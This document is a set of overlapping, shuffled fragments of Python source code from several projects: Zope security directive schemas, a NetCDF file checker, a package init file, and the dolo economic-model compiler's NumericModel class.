# # This software is subject to the provisions of the Zope", "Tokens, PythonIdentifier import zope.interface import zope.schema from zope.interface import Interface import zope.security.zcml from", "description=u\"The attributes to provide access to.\", value_type=PythonIdentifier(), required=False) interface = Tokens( title=u\"Interface\", description=(u\"Interfaces", "part of the class to be publicly viewable (that is, requires the zope.Public", "class IClassDirective(zope.interface.Interface): \"\"\"Make statements about a class\"\"\" class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True )", "list of names or the names in a given Interface require a given", "description=_(\"\"\" the identifier for this factory in the ZMI factory identification scheme. If", "the identifier for this factory in the ZMI factory identification scheme. If not", "or to any names defined by interfaces listed in the interface attribute. \"\"\"", "in the same way the specified class' security is. If this argument is", "of names or the names in a given Interface require a given permission", "description=u\"Pointer to the module object.\", required=True) class IAllow(Interface): \"\"\"Allow access to selected module", "class to be publicly viewable (that is, requires the zope.Public permission). Only one", "zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the identifier for this factory in the ZMI factory identification", "required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed interfaces' methods and attributes\"", "GlobalObject( title=u\"Module\", description=u\"Pointer to the module object.\", required=True) class IAllow(Interface): \"\"\"Allow access to", "Access is unconditionally allowed to any names provided directly in the attributes attribute", "class IModule(Interface): \"\"\"Group security declarations about a module\"\"\" module = GlobalObject( title=u\"Module\", description=u\"Pointer", "\" u\"interface(s). Multiple interfaces can be supplied.\"), value_type=GlobalInterface(), required=False) class IRequire(Interface): \"\"\"Require a", "object.\", required=True) class IAllow(Interface): \"\"\"Allow access to selected module attributes Access is unconditionally", "defined by the \" u\"interface(s). Multiple interfaces can be supplied.\"), value_type=GlobalInterface(), required=False) class", "\"\"\" interface = zope.configuration.fields.Tokens( title=_(\"One or more interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface):", "to any names defined by interfaces listed in the interface attribute. \"\"\" attributes", "required=False, ) class IModule(Interface): \"\"\"Group security declarations about a module\"\"\" module = GlobalObject(", "(c) 2001, 2002 Zope Foundation and Contributors. # All Rights Reserved. # #", "interfaces\"), required=True, value_type=zope.configuration.fields.GlobalInterface() ) class IRequireSubdirective(zope.interface.Interface): \"\"\"Indicate that the a specified list of", "AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. 
# ############################################################################## \"\"\"Component architecture", "about a class\"\"\" class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\"), required=True ) class IImplementsSubdirective(zope.interface.Interface): \"\"\"Declare that", "required=False, value_type=zope.configuration.fields.GlobalInterface(), ) like_class = zope.configuration.fields.GlobalObject( title=_(\"Configure like this class\"), description=_(\"\"\" This argument", "of the ZPL should accompany this distribution. # THIS SOFTWARE IS PROVIDED \"AS", "Only one of the following two attributes may be used. \"\"\" attributes =", "required=False, ) attributes = zope.configuration.fields.Tokens( title=_(\"Attributes and methods\"), description=_(\"This is a list of", "id = zope.schema.Id( title=_(\"ID\"), description=_(\"\"\" the identifier for this factory in the ZMI", "= GlobalObject( title=u\"Module\", description=u\"Pointer to the module object.\", required=True) class IAllow(Interface): \"\"\"Allow access", "require a given permission for access. \"\"\" permission = zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies", "description=_(\"\"\" This argument says that this content class should be configured in the", "zope.configuration.fields.Tokens( title=_(\"Interface\"), required=False, value_type=zope.configuration.fields.GlobalInterface(), ) class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory used to create", "= zope.configuration.fields.Tokens( title=_(\"Interfaces\"), description=_(\"The listed interfaces' methods and attributes\" \" can be accessed.\"),", ") class IFactorySubdirective(zope.interface.Interface): \"\"\"Specify the factory used to create this content object\"\"\" id", "__docformat__ = 'restructuredtext' import zope.configuration.fields from zope.configuration.fields import GlobalObject, GlobalInterface from zope.configuration.fields import", "a management interface\"), required=False, ) description = zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative description of", "be used. \"\"\" attributes = zope.configuration.fields.Tokens( title=_(\"Attributes\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens(", "whos names to provide access to. Access \" u\"will be provided to all", "import Tokens, PythonIdentifier import zope.interface import zope.schema from zope.interface import Interface import zope.security.zcml", "list of attributes that can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface =", "the factory used to create this content object\"\"\" id = zope.schema.Id( title=_(\"ID\"), description=_(\"\"\"", "FOR A PARTICULAR PURPOSE. # ############################################################################## \"\"\"Component architecture related 'zope' ZCML namespace directive", "import Interface import zope.security.zcml from zope.security.i18n import ZopeMessageFactory as _ from zope.security.zcml import", "# # Copyright (c) 2001, 2002 Zope Foundation and Contributors. 
# All Rights", "set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes that can be set\"), description=_(\"This is a list of", "required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes that can be set\"), description=_(\"This is", "that can be accessed.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) set_attributes = zope.configuration.fields.Tokens( title=_(\"Attributes that can", "access any names provided directly in the attributes attribute or any names defined", "of attributes that can be\" \" modified/mutated.\"), required=False, value_type=zope.configuration.fields.PythonIdentifier(), ) interface = zope.configuration.fields.Tokens(", "\" of a management interface\"), required=False, ) description = zope.configuration.fields.MessageID( title=_(\"Description\"), description=_(\"Longer narrative", "from zope.configuration.fields import Tokens, PythonIdentifier import zope.interface import zope.schema from zope.interface import Interface", "that this content class should be configured in the same way the specified", "zope.configuration.fields import Tokens, PythonIdentifier import zope.interface import zope.schema from zope.interface import Interface import", "a given permission for access. \"\"\" permission = zope.security.zcml.Permission( title=_(\"Permission\"), description=_(\"\"\" Specifies the", "in a given Interface require a given permission for access. \"\"\" permission =", "import Permission class IClassDirective(zope.interface.Interface): \"\"\"Make statements about a class\"\"\" class_ = zope.configuration.fields.GlobalObject( title=_(\"Class\")," ]
[ "from .display import * from .getters import * from .pattern import * from", "from .density import * from .display import * from .getters import * from", "import * from .pattern import * from .patternartist import * __all__ = [name", ".getters import * from .pattern import * from .patternartist import * __all__ =", ".patternartist import * __all__ = [name for name in dir() if not name.startswith('_')]", "from .pattern import * from .patternartist import * __all__ = [name for name", "print_function from .density import * from .display import * from .getters import *", "__future__ import absolute_import from __future__ import division from __future__ import print_function from .density", "from __future__ import print_function from .density import * from .display import * from", "import print_function from .density import * from .display import * from .getters import", "import * from .patternartist import * __all__ = [name for name in dir()", "import absolute_import from __future__ import division from __future__ import print_function from .density import", "from __future__ import division from __future__ import print_function from .density import * from", "import division from __future__ import print_function from .density import * from .display import", "division from __future__ import print_function from .density import * from .display import *", "import * from .display import * from .getters import * from .pattern import", "* from .display import * from .getters import * from .pattern import *", ".display import * from .getters import * from .pattern import * from .patternartist", "from __future__ import absolute_import from __future__ import division from __future__ import print_function from", "* from .getters import * from .pattern import * from .patternartist import *", "from .getters import * from .pattern import * from .patternartist import * __all__", ".pattern import * from .patternartist import * __all__ = [name for name in", "__future__ import print_function from .density import * from .display import * from .getters", "* from .pattern import * from .patternartist import * __all__ = [name for", "__future__ import division from __future__ import print_function from .density import * from .display", ".density import * from .display import * from .getters import * from .pattern", "* from .patternartist import * __all__ = [name for name in dir() if", "from .patternartist import * __all__ = [name for name in dir() if not", "import * from .getters import * from .pattern import * from .patternartist import", "absolute_import from __future__ import division from __future__ import print_function from .density import *" ]
[ "Path(str(path).replace(\".nc\", \".check\")) try: with Dataset(path) as i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except Exception: text_file", "Dataset(path) as i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except Exception: text_file = open(str(outfile), \"w\") text_file.write(\"Could", "in pathlist: outfile = Path(str(path).replace(\".nc\", \".check\")) try: with Dataset(path) as i_data: i_data.uc2_check() i_data.check_result.to_file(outfile,", "\".check\")) try: with Dataset(path) as i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except Exception: text_file =", "try: with Dataset(path) as i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except Exception: text_file = open(str(outfile),", "outfile = Path(str(path).replace(\".nc\", \".check\")) try: with Dataset(path) as i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except", ".Dataset import Dataset from pathlib import Path def check_multi(folder): pathlist = Path(folder).glob('**/*.nc') for", "from pathlib import Path def check_multi(folder): pathlist = Path(folder).glob('**/*.nc') for path in pathlist:", "i_data.check_result.to_file(outfile, full=False) except Exception: text_file = open(str(outfile), \"w\") text_file.write(\"Could not read file: \"+str(path))", "Path(folder).glob('**/*.nc') for path in pathlist: outfile = Path(str(path).replace(\".nc\", \".check\")) try: with Dataset(path) as", "Path def check_multi(folder): pathlist = Path(folder).glob('**/*.nc') for path in pathlist: outfile = Path(str(path).replace(\".nc\",", "= Path(folder).glob('**/*.nc') for path in pathlist: outfile = Path(str(path).replace(\".nc\", \".check\")) try: with Dataset(path)", "check_multi(folder): pathlist = Path(folder).glob('**/*.nc') for path in pathlist: outfile = Path(str(path).replace(\".nc\", \".check\")) try:", "def check_multi(folder): pathlist = Path(folder).glob('**/*.nc') for path in pathlist: outfile = Path(str(path).replace(\".nc\", \".check\"))", "pathlist = Path(folder).glob('**/*.nc') for path in pathlist: outfile = Path(str(path).replace(\".nc\", \".check\")) try: with", "import Path def check_multi(folder): pathlist = Path(folder).glob('**/*.nc') for path in pathlist: outfile =", "i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except Exception: text_file = open(str(outfile), \"w\") text_file.write(\"Could not read file:", "pathlib import Path def check_multi(folder): pathlist = Path(folder).glob('**/*.nc') for path in pathlist: outfile", "pathlist: outfile = Path(str(path).replace(\".nc\", \".check\")) try: with Dataset(path) as i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False)", "as i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except Exception: text_file = open(str(outfile), \"w\") text_file.write(\"Could not", "import Dataset from pathlib import Path def check_multi(folder): pathlist = Path(folder).glob('**/*.nc') for path", "for path in pathlist: outfile = Path(str(path).replace(\".nc\", \".check\")) try: with Dataset(path) as i_data:", "i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except Exception: text_file = open(str(outfile), \"w\") text_file.write(\"Could not read", "path in pathlist: outfile = Path(str(path).replace(\".nc\", \".check\")) try: with Dataset(path) as i_data: i_data.uc2_check()", "= Path(str(path).replace(\".nc\", \".check\")) try: with Dataset(path) as 
i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except Exception:", "Dataset from pathlib import Path def check_multi(folder): pathlist = Path(folder).glob('**/*.nc') for path in", "full=False) except Exception: text_file = open(str(outfile), \"w\") text_file.write(\"Could not read file: \"+str(path)) text_file.close()", "from .Dataset import Dataset from pathlib import Path def check_multi(folder): pathlist = Path(folder).glob('**/*.nc')", "with Dataset(path) as i_data: i_data.uc2_check() i_data.check_result.to_file(outfile, full=False) except Exception: text_file = open(str(outfile), \"w\")" ]
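
# Hypothetical usage sketch for check_multi: scan a folder tree of UC2
# NetCDF files; each "x.nc" gets an "x.check" report, and unreadable files
# get a short error note instead, so one bad file does not stop the scan.
# The folder path is an assumed example:
if __name__ == '__main__':
    check_multi("/data/uc2-campaign")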
[ "= self.symbols[comp_order[0]][i] eq, comp = str.split(eq,'|') lhs, rhs = decode_complementarity(comp, control) comps.append([lhs, rhs])", "= self.residuals() # for eqgroup, eqlist in self.symbolic.equations.items(): for eqgroup in res.keys(): eqlist", "'controls_ub' in self.functions: fun_lb = self.functions['controls_lb'] fun_ub = self.functions['controls_ub'] return [fun_lb, fun_ub] else:", "in self.symbols.keys() if pname in self.symbols[g]] try: group = group[0] except: raise Exception('Unknown", "decode_complementarity(comp, control) comps.append([lhs, rhs]) else: comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs, comp_rhs = zip(*comps) #", "original_gufunctions = {} for funname in recipe['specs'].keys(): spec = recipe['specs'][funname] if funname not", "{} for funname in recipe['specs'].keys(): spec = recipe['specs'][funname] if funname not in self.symbolic.equations:", "= CalibrationDict(self.symbols, calib) from .symbolic_eval import NumericEval evaluator = NumericEval(self.calibration_dict) # read symbolic", "0 vals = '{:.4f}'.format(val) if abs(val) > 1e-8: vals = colored(vals, 'red') #", "n_output = len(self.symbols[target_spec[0]]) # target_short_name = spec.get('target')[2] if spec.get('recursive') is False: target_spec =", "k not in ('parameters','shocks','values')], ()) self.options = options if options is not None", "eq in eqs] arg_names = recipe['specs'][funname]['eqs'] ddefs = OrderedDict() for ag in arg_names:", "symbol {}.'.format(pname)) i = self.symbols[group].index(pname) v = self.calibration[group][i] return v def set_calibration(self, *args,", "CalibrationDict, calibration_to_vector calib = calibration_to_vector(self.symbols, self.calibration_dict) self.calibration = CalibrationDict(self.symbols, calib) from .symbolic_eval import", "defs = self.symbolic.definitions # works for fg models only model_type = self.model_type if", "1e-8: vals = colored(vals, 'red') # eq = eq.replace('|', u\"\\u27C2\") ss += u\"", "lhs = ast.parse( str.strip(lhs) ).body[0].value rhs = ast.parse( str.strip(rhs) ).body[0].value tmp = timeshift(rhs,", "gu_upper_bound = compile_function_ast(comp_rhs, symbols, comp_args, funname=fb_names[1],definitions=defs) n_output = len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound, n_output", "= self.symbols # should match self.symbols comps = [] functions = {} original_functions", "pname and pvalue calib = self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__() def __str__(self): from dolo.misc.termcolor import", "for k,e in self.symbols.items() if k not in ('parameters','shocks','values')], ()) self.options = options", "the symbolic definitions system = self.symbolic.calibration_dict from dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict = solve_triangular_system(", "self.model_type == 'dtmscc': from dolo.algos.dtmscc.steady_state import residuals return residuals(self, calib) def eval_formula(self, expr,", "= self.calibration[group][i] return v def set_calibration(self, *args, **kwargs): # raise exception if unknown", "upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound # rewrite all equations as rhs", "= None markov_chain = None def __init__(self, symbolic_model, options=None, infos=None): self.symbolic = symbolic_model", "# rewrite all equations as rhs - lhs def filter_equal(eq): if '=' in", "''' try: res = regex.match(comp).groups() except: raise Exception(\"Unable to parse complementarity condition 
'{}'\".format(comp))", "import njit class NumericModel: calibration = None calibration_dict = None covariances = None", "self.infos['type'] # self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self): import numpy # updates calibration according", "system = self.symbolic.calibration_dict from dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict = solve_triangular_system( system ) from", "to parse complementarity condition '{}'\".format(comp)) res = [r.strip() for r in res] if", "match self.symbols comps = [] functions = {} original_functions = {} original_gufunctions =", "for eq in eqs] target_spec = spec.get('target') n_output = len(self.symbols[target_spec[0]]) # target_short_name =", "= [numpy.atleast_2d(numpy.array(tab, dtype=float)) for tab in markov_chain] def get_calibration(self, pname, *args): if isinstance(pname,", "# self.model_spec self.__update_from_symbolic__() self.__compile_functions__() def __update_from_symbolic__(self): import numpy # updates calibration according to", "calib) elif self.model_type == 'dtmscc': from dolo.algos.dtmscc.steady_state import residuals return residuals(self, calib) def", "self.calibration_dict) self.calibration = CalibrationDict(self.symbols, calib) from .symbolic_eval import NumericEval evaluator = NumericEval(self.calibration_dict) #", "if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun = compile_function_ast(eqs,", "dolo.compiler.function_compiler_ast import compile_function_ast from dolo.compiler.function_compiler import standard_function defs = self.symbolic.definitions # works for", "residuals:\\n' # s += pprint.pformat(compute_residuals(self),indent=2, depth=1) return s def __repr__(self): return self.__str__() @property", "res[1] != control: msg = \"Complementarity condition '{}' incorrect. Expected {} instead of", "for p in pname ] elif isinstance(pname, tuple): return tuple( [ self.get_calibration(p) for", "t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args, funname=fb_names[0],definitions=defs) upper_bound,", "arg_names = recipe['specs'][funname]['eqs'] ddefs = OrderedDict() for ag in arg_names: if ag[0] ==", "# raise exception if unknown symbol ? 
if len(args)==2: pname, pvalue = args", "eval_formula(self, expr, dataframe=None, calib=None): from dolo.compiler.eval_formula import eval_formula if calib is None: calib", "original_gufunctions[funname] = gufun self.__original_functions__ = original_functions self.__original_gufunctions__ = original_gufunctions self.functions = functions import", "calibration_to_vector(self.symbols, self.calibration_dict) self.calibration = CalibrationDict(self.symbols, calib) from .symbolic_eval import NumericEval evaluator = NumericEval(self.calibration_dict)", "= args if isinstance(pname, str): self.set_calibration(**{pname:pvalue}) else: # else ignore pname and pvalue", "tuple): return tuple( [ self.get_calibration(p) for p in pname ] ) elif len(args)>0:", "1e-8: val = 0 vals = '{:.4f}'.format(val) if abs(val) > 1e-8: vals =", "fun functions[funname] = standard_function(gufun, n_output ) original_functions[funname] = fun original_gufunctions[funname] = gufun self.__original_functions__", "+= '- residuals:\\n' # s += pprint.pformat(compute_residuals(self),indent=2, depth=1) return s def __repr__(self): return", "be either: - None - \"a<=expr\" where a is a controls - \"expr<=a\"", "import numpy # updates calibration according to the symbolic definitions system = self.symbolic.calibration_dict", "target_short_name = spec.get('target')[2] if spec.get('recursive') is False: target_spec = None else: target_spec[2] =", "gufun self.__original_functions__ = original_functions self.__original_gufunctions__ = original_gufunctions self.functions = functions import re regex", "------------ - name: \"{name}\" - type: \"{type}\" - file: \"{filename}\\n'''.format(**self.infos) ss = '\\n-", "self.calibration_dict = solve_triangular_system( system ) from dolo.compiler.misc import CalibrationDict, calibration_to_vector calib = calibration_to_vector(self.symbols,", "according to the symbolic definitions system = self.symbolic.calibration_dict from dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict", "symbolic_model, options=None, infos=None): self.symbolic = symbolic_model self.symbols = symbolic_model.symbols self.variables = sum( [tuple(e)", "either: - None - \"a<=expr\" where a is a controls - \"expr<=a\" where", "timeshift(lhs, self.variables, time) k = StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v) auxdefs[time]", "original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]] = gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound #", "doesn't contain equations of type '{}'.\".format(funname)) else: continue if spec.get('target'): # keep only", "= {} for funname in recipe['specs'].keys(): spec = recipe['specs'][funname] if funname not in", "ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun = compile_function_ast(eqs, symbols,", "distribution is None: self.covariances = None else: self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain =", "= (pname,) + args return self.get_calibration(pnames) group = [g for g in self.symbols.keys()", "set_calibration(self, *args, **kwargs): # raise exception if unknown symbol ? 
if len(args)==2: pname,", "dolo.compiler.function_compiler import standard_function defs = self.symbolic.definitions # works for fg models only model_type", "NumericEval evaluator = NumericEval(self.calibration_dict) # read symbolic structure self.options = evaluator.eval(self.symbolic.options) distribution =", "original_gufunctions[fb_names[1]] = gu_upper_bound # rewrite all equations as rhs - lhs def filter_equal(eq):", "ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols,", "= gu_lower_bound original_gufunctions[fb_names[1]] = gu_upper_bound # rewrite all equations as rhs - lhs", ")'.format(rhs, lhs) eq = str.strip(eq) return eq else: return eq eqs = [filter_equal(eq)", "rhs = decode_complementarity(comp, control) comps.append([lhs, rhs]) else: comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs, comp_rhs =", "= gufun self.__original_functions__ = original_functions self.__original_gufunctions__ = original_gufunctions self.functions = functions import re", "return v def set_calibration(self, *args, **kwargs): # raise exception if unknown symbol ?", "eq.split('=') lhs = ast.parse( str.strip(lhs) ).body[0].value rhs = ast.parse( str.strip(rhs) ).body[0].value tmp =", "= [] functions = {} original_functions = {} original_gufunctions = {} for funname", "> 1e-8: vals = colored(vals, 'red') # eq = eq.replace('|', u\"\\u27C2\") ss +=", "if not spec.get('optional'): raise Exception(\"The model doesn't contain equations of type '{}'.\".format(funname)) else:", "Model object: ------------ - name: \"{name}\" - type: \"{type}\" - file: \"{filename}\\n'''.format(**self.infos) ss", "dd[to_source(k)] = to_source(v) auxdefs[time] = dd recipe = recipes[model_type] symbols = self.symbols #", "= {} original_gufunctions = {} for funname in recipe['specs'].keys(): spec = recipe['specs'][funname] if", "not None else {} self.infos = infos if infos is not None else", "if funname not in self.symbolic.equations: if not spec.get('optional'): raise Exception(\"The model doesn't contain", "self.symbolic = symbolic_model self.symbols = symbolic_model.symbols self.variables = sum( [tuple(e) for k,e in", "is a control - \"expr1<=a<=expr2\" ''' try: res = regex.match(comp).groups() except: raise Exception(\"Unable", "import NumericEval evaluator = NumericEval(self.calibration_dict) # read symbolic structure self.options = evaluator.eval(self.symbolic.options) distribution", "[r.strip() for r in res] if res[1] != control: msg = \"Complementarity condition", "rhs = str.split(eq,'=') eq = '{} - ( {} )'.format(rhs, lhs) eq =", "'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) fun, gufun = compile_function_ast(eqs, symbols, arg_names, output_names=target_spec,", "i = self.symbols[group].index(pname) v = self.calibration[group][i] return v def set_calibration(self, *args, **kwargs): #", "eq in enumerate(eqlist): val = res[eqgroup][i] if abs(val) < 1e-8: val = 0", "if '=' in eq: lhs, rhs = str.split(eq,'=') eq = '{} - (", "rewrite all equations as rhs - lhs def filter_equal(eq): if '=' in eq:", "eqs=eq) ss += \"\\n\" s += ss # import pprint # s +=", "if '|' in eq: control = self.symbols[comp_order[0]][i] eq, comp = str.split(eq,'|') lhs, rhs", "ss += u\" {}\\n\".format(eqgroup) for i, eq in enumerate(eqlist): val = res[eqgroup][i] if", "# keep only right-hand side # TODO: restore recursive definitions eqs = self.symbolic.equations[funname]", "< 1e-8: val = 0 vals = '{:.4f}'.format(val) if abs(val) > 1e-8: 
vals", "calibration_to_vector calib = calibration_to_vector(self.symbols, self.calibration_dict) self.calibration = CalibrationDict(self.symbols, calib) from .symbolic_eval import NumericEval", "[tuple(e) for k,e in self.symbols.items() if k not in ('parameters','shocks','values')], ()) self.options =", "definitions system = self.symbolic.calibration_dict from dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict = solve_triangular_system( system )", "comp_spec = spec.get('complementarities') comp_order = comp_spec['middle'] comp_args = comp_spec['left-right'] comps = [] eqs", "filter_equal(eq): if '=' in eq: lhs, rhs = str.split(eq,'=') eq = '{} -", "abs(val) < 1e-8: val = 0 vals = '{:.4f}'.format(val) if abs(val) > 1e-8:", "= len(comp_lhs) functions[fb_names[0]] = standard_function(gu_lower_bound, n_output ) functions[fb_names[1]] = standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]]", "return residuals(self, calib) elif self.model_type == 'dtmscc': from dolo.algos.dtmscc.steady_state import residuals return residuals(self,", "self.__original_gufunctions__ = original_gufunctions self.functions = functions import re regex = re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp,", "covariances = None markov_chain = None def __init__(self, symbolic_model, options=None, infos=None): self.symbolic =", "= [eq.split('=')[1] for eq in eqs] eqs = [str.strip(eq) for eq in eqs]", "from collections import OrderedDict from .codegen import to_source from .function_compiler_ast import timeshift, StandardizeDatesSimple", "def __init__(self, symbolic_model, options=None, infos=None): self.symbolic = symbolic_model self.symbols = symbolic_model.symbols self.variables =", "k = timeshift(lhs, self.variables, time) k = StandardizeDatesSimple(self.variables).visit(k) v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] =", "eq = '{} - ( {} )'.format(rhs, lhs) eq = str.strip(eq) return eq", "= original_gufunctions self.functions = functions import re regex = re.compile(\"(.*)<=(.*)<=(.*)\") def decode_complementarity(comp, control):", "''' # comp can be either: - None - \"a<=expr\" where a is", "decode_complementarity(comp, control): ''' # comp can be either: - None - \"a<=expr\" where", "self.covariances = None else: self.covariances = numpy.atleast_2d(numpy.array(covariances, dtype=float)) markov_chain = discrete_transition if markov_chain", "None if spec.get('complementarities'): # TODO: Rewrite and simplify comp_spec = spec.get('complementarities') comp_order =", "eq in auxeqs: lhs, rhs = eq.split('=') lhs = ast.parse( str.strip(lhs) ).body[0].value rhs", "pvalue calib = self.symbolic.calibration_dict calib.update(kwargs) self.__update_from_symbolic__() def __str__(self): from dolo.misc.termcolor import colored s", "= ast.parse( str.strip(rhs) ).body[0].value tmp = timeshift(rhs, self.variables, time) k = timeshift(lhs, self.variables,", "abs(val) > 1e-8: vals = colored(vals, 'red') # eq = eq.replace('|', u\"\\u27C2\") ss", "eval_formula(expr, dataframe=dataframe, context=calib) def __compile_functions__(self): from dolo.compiler.function_compiler_ast import compile_function_ast from dolo.compiler.function_compiler import standard_function", "eq eqs = [filter_equal(eq) for eq in eqs] arg_names = recipe['specs'][funname]['eqs'] ddefs =", "__repr__(self): return self.__str__() @property def x_bounds(self): if 'controls_ub' in self.functions: fun_lb = self.functions['controls_lb']", "standard_function(gu_lower_bound, n_output 
) functions[fb_names[1]] = standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]] =", "= res[eqgroup][i] if abs(val) < 1e-8: val = 0 vals = '{:.4f}'.format(val) if", "return eval_formula(expr, dataframe=dataframe, context=calib) def __compile_functions__(self): from dolo.compiler.function_compiler_ast import compile_function_ast from dolo.compiler.function_compiler import", "(pname,) + args return self.get_calibration(pnames) group = [g for g in self.symbols.keys() if", "rhs]) else: comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs, comp_rhs = zip(*comps) # fb_names = ['{}_lb'.format(funname),", "context=calib) def __compile_functions__(self): from dolo.compiler.function_compiler_ast import compile_function_ast from dolo.compiler.function_compiler import standard_function defs =", "= decode_complementarity(comp, control) comps.append([lhs, rhs]) else: comps.append(['-inf', 'inf']) eqs.append(eq) comp_lhs, comp_rhs = zip(*comps)", "for i,eq in enumerate(self.symbolic.equations[funname]): if '|' in eq: control = self.symbols[comp_order[0]][i] eq, comp", "OrderedDict() for eq in auxeqs: lhs, rhs = eq.split('=') lhs = ast.parse( str.strip(lhs)", "to the symbolic definitions system = self.symbolic.calibration_dict from dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict =", "raise Exception(\"The model doesn't contain equations of type '{}'.\".format(funname)) else: continue if spec.get('target'):", "OrderedDict() for ag in comp_args: if ag[0] == 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t])", "where a is a control - \"expr1<=a<=expr2\" ''' try: res = regex.match(comp).groups() except:", "import timeshift, StandardizeDatesSimple from dolo.compiler.recipes import recipes from numba import njit class NumericModel:", "'{}_ub'.format(funname)] fb_names = ['controls_lb'.format(funname), 'controls_ub'.format(funname)] ddefs = OrderedDict() for ag in comp_args: if", "Exception('Unknown symbol {}.'.format(pname)) i = self.symbols[group].index(pname) v = self.calibration[group][i] return v def set_calibration(self,", "not in self.symbols: model_type += '_' else: # prepare auxiliaries auxeqs = self.symbolic.equations['auxiliary']", "comps = [] eqs = [] for i,eq in enumerate(self.symbolic.equations[funname]): if '|' in", "self.__compile_functions__() def __update_from_symbolic__(self): import numpy # updates calibration according to the symbolic definitions", "if abs(val) > 1e-8: vals = colored(vals, 'red') # eq = eq.replace('|', u\"\\u27C2\")", "spec.get('target'): # keep only right-hand side # TODO: restore recursive definitions eqs =", "vals = '{:.4f}'.format(val) if abs(val) > 1e-8: vals = colored(vals, 'red') # eq", "pname, *args): if isinstance(pname, list): return [ self.get_calibration(p) for p in pname ]", "p in pname ] ) elif len(args)>0: pnames = (pname,) + args return", "ss += u\" {eqn:3} : {vals} : {eqs}\\n\".format(eqn=str(i+1), vals=vals, eqs=eq) ss += \"\\n\"", "v = StandardizeDatesSimple(self.variables).visit(tmp) dd[to_source(k)] = to_source(v) auxdefs[time] = dd recipe = recipes[model_type] symbols", "ast.parse( str.strip(lhs) ).body[0].value rhs = ast.parse( str.strip(rhs) ).body[0].value tmp = timeshift(rhs, self.variables, time)", "type '{}'.\".format(funname)) else: continue if spec.get('target'): # keep only right-hand side # TODO:", "for eq in eqs] eqs = [str.strip(eq) for eq in eqs] target_spec =", "= len(self.symbols[target_spec[0]]) # target_short_name = 
spec.get('target')[2] if spec.get('recursive') is False: target_spec = None", "in eq: control = self.symbols[comp_order[0]][i] eq, comp = str.split(eq,'|') lhs, rhs = decode_complementarity(comp,", "def eval_formula(self, expr, dataframe=None, calib=None): from dolo.compiler.eval_formula import eval_formula if calib is None:", "functions[fb_names[1]] = standard_function(gu_upper_bound, n_output ) original_functions[fb_names[0]] = lower_bound original_functions[fb_names[1]] = upper_bound original_gufunctions[fb_names[0]] =", "comp can be either: - None - \"a<=expr\" where a is a controls", "solve_triangular_system self.calibration_dict = solve_triangular_system( system ) from dolo.compiler.misc import CalibrationDict, calibration_to_vector calib =", "self.options = options if options is not None else {} self.infos = infos", "works for fg models only model_type = self.model_type if 'auxiliaries' not in self.symbols:", "== 'auxiliaries': t = ag[1] ddefs.update(auxdefs[t]) ddefs.update(defs) lower_bound, gu_lower_bound = compile_function_ast(comp_lhs, symbols, comp_args,", "- ( {} )'.format(rhs, lhs) eq = str.strip(eq) return eq else: return eq", "dolo.compiler.triangular_solver import solve_triangular_system self.calibration_dict = solve_triangular_system( system ) from dolo.compiler.misc import CalibrationDict, 